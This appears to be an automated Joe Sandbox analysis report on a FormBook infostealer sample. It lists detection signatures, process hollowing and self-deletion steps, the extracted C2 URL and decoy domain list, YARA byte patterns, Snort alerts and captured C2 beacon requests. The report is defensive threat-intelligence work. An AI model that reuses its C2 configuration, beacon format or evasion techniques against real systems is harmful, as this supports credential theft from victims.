Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report UGGJ4NnzFz

Overview

General Information

Sample Name:UGGJ4NnzFz (renamed file extension from none to exe)
Analysis ID:432566
MD5:b148ae414eb8a1b34a15cdb32c21f9ee
SHA1:25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256:193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UGGJ4NnzFz.exe (PID: 4884 cmdline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
    • UGGJ4NnzFz.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6512 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6668 cmdline: /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.UGGJ4NnzFz.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.UGGJ4NnzFz.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.UGGJ4NnzFz.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        1.1.UGGJ4NnzFz.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.UGGJ4NnzFz.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: UGGJ4NnzFz.exeVirustotal: Detection: 29%Perma Link
          Source: UGGJ4NnzFz.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: UGGJ4NnzFz.exeJoe Sandbox ML: detected
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.cmmon32.exe.624368.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.cmmon32.exe.4a87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: UGGJ4NnzFz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmmon32.pdb source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: UGGJ4NnzFz.exe, 00000000.00000003.212550994.0000000009A50000.00000004.00000001.sdmp, UGGJ4NnzFz.exe, 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, cmmon32.exe, 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: UGGJ4NnzFz.exe, cmmon32.exe
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\UGGJ4NnzFz.exeJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyA3E3.tmpJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\dceotuvjnitpzJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6Jump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 4x nop then pop esi1_2_0041583E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 4x nop then pop ebx1_2_00406A96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop esi9_2_003B583E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx9_2_003A6A96

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rebeccannemontgomery.net/dp3a/
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.protectpursuit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1Host: www.freshdeliciousberryfarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.sw-advisers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1Host: www.goldgrandpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1Host: www.goldinsacks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1Host: www.growwithjenn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.bring-wellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.protectpursuit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1Host: www.freshdeliciousberryfarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.sw-advisers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1Host: www.goldgrandpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1Host: www.goldinsacks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1Host: www.growwithjenn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.bring-wellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.allyexpense.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Jun 2021 12:36:41 GMTContent-Length: 0Connection: closeVary: Origin
          Source: explorer.exe, 00000005.00000000.243022524.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: UGGJ4NnzFz.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: UGGJ4NnzFz.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: cmmon32.exe, 00000009.00000002.479471132.0000000004C02000.00000004.00000001.sdmpString found in binary or memory: http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkT
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042
          Source: UGGJ4NnzFz.exe, 00000000.00000002.219983630.00000000006FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
